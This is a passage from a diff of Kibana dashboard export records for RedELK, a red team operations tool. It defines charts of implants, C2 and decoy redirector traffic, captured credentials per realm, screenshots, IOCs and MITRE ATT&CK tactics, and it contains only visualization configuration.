"search"}], "sort": [1642171875895, 194], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials per realm tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"creds.realm.keyword\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Credentials per realm tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 196], "type": "visualization", "version": "1"} \ No newline at end of file +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-12M\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Type\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - IOC over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2209], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Screenshots\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Screenshots\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Screenshots over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2211], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links internal", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Dashboard links internal\",\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)\",\"openLinksInNewTab\":false}}"}, "coreMigrationVersion": "7.16.2", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642152856829, 2212], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top computers with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":17,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Hostname\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top computers with new implants\"}"}, "coreMigrationVersion": "7.16.2", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152856829, 2215], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"NOT (redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - Decoy", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - Decoy\"}"}, "coreMigrationVersion": "7.16.2", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2217], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"(redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - C2", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - C2\"}"}, "coreMigrationVersion": "7.16.2", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2219], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists metrics", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists metrics\",\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"IPs\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"group\"}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}}}"}, "coreMigrationVersion": "7.16.2", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2221], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Techniques\"}"}, "coreMigrationVersion": "7.16.2", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2223], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Tactics\"}"}, "coreMigrationVersion": "7.16.2", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2225], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.source\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2227], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Modules results donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Modules results donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"split\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.last_run.status\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"row\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2229], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC Types tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Types\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - IOC Types tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2231], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Screenshots total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2233], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed 